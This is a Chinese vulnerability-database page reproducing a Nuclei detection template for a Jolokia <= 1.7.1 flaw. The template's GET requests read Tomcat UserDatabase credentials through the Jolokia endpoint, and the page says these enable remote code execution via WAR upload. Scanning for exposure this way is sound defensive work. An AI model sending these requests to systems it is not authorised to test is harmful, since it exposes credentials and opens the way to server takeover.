jolokia-tomcat-creds-leak: Jolokia <= 1.7.1 Information Leakage

日期: 2025-08-01 | 影响软件: Jolokia | POC: 已公开

漏洞描述

Tomcat's credential disclosure leading to Remote Code Execution via WAR upload.

PoC代码[已公开]

id: jolokia-tomcat-creds-leak

info:
  name: Jolokia <= 1.7.1 Information Leakage
  author: pathtaga
  severity: critical
  description: Tomcat's credential disclosure leading to Remote Code Execution via WAR upload.
  tags: jolokia,tomcat,exposure,vuln
  reference:
    - https://github.com/laluka/jolokia-exploitation-toolkit/blob/main/exploits/info-leak-tomcat-creds.py
    - https://therealcoiffeur.github.io/c11011

http:
  - method: GET
    path:
      - "{{BaseURL}}/jolokia/read/Users:database=UserDatabase,type=UserDatabase"
      - "{{BaseURL}}/actuator/jolokia/read/Users:database=UserDatabase,type=UserDatabase"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"mbean":"Users:database=UserDatabase,type=UserDatabase"'
          - '"users":'
        condition: and

      - type: word
        part: body
        words:
          - '"users":[]'
        negative: true
# digest: 4a0a00473045022100da943127b7ae9861849075ebe802fa2792285210da3f5203307ec1d43b09b262022074302171532ca33b1007612c1397f49717af9ff40eec6106d9a75b67b4c5e122:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/jolokia/jolokia-tomcat-creds-leak.yaml

相关漏洞推荐